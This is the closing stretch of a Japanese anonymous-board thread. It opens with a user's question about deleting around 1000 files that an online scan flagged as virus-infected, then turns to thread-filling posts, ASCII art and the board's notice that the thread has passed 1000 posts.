オンラインウイルススキャンっていうのをやったら1000個程のファイルがウイルスに感染してる ことが分かりました。で、このファイルを全て削除するとまずいことが起こったりするのですか? たしかウイルスの種類は「WARM」とか書いてあったような気がします。
さげさげ
だめ?
つ〜か、うめきれんのか....
a
985
あさげ
アヒャ モナー ハヤクウメタテロ!! __∧ ∧ /\ (*゚∀゚)\ \/| ̄∪∪ ̄|\ \|_〓〓_|
λ_λ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ( `ー´) < 今、TBSのドラマに故・伊藤俊人さんがでてるんじゃネーノ? / ノつ \__________ (人_つ_つ
∧_∧ <丶`∀´> オマイラも埋め立てに協力するニダ!! ( ) | | | 〈_フ__フ
う・め・た・て・ろ!
うめ〜
___ / \ \ | ハ .| ̄ ̄| |__|_| |(,,゚Д゚) __< (ノ ニ<) | | | | ∞ | | v |__| \__∠__/ U U
_____ | ___|__| | |__|_ |_ \(,,゚Д゚) __ヽ(ノ  ̄ i) | | | | ∞ | | v |__| \__∠__/ U U
____ / |__| | / ̄/ |  ̄\(,,゚Д゚) | ハ (ノ  ̄ i) | | | | ∞ | | v |__| \__∠__/ U U
_____ | __. | | |_|_| | | | |(,,゚Д゚) | (ノ i) | | ∞ | | | | | |__|  ̄U U
もちょい!
___ / \ \ | ハ .| ̄ ̄| | | | |(,,゚Д゚) | v (ノ i) \__. | ∞ | __/ |__| |__∠__/ U U
___ / \ \ | ハ .| ̄ ̄| | | | |(,,゚Д゚) | | | (ノ i) | | | | ∞ | | v |__| \__∠__/ U U
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。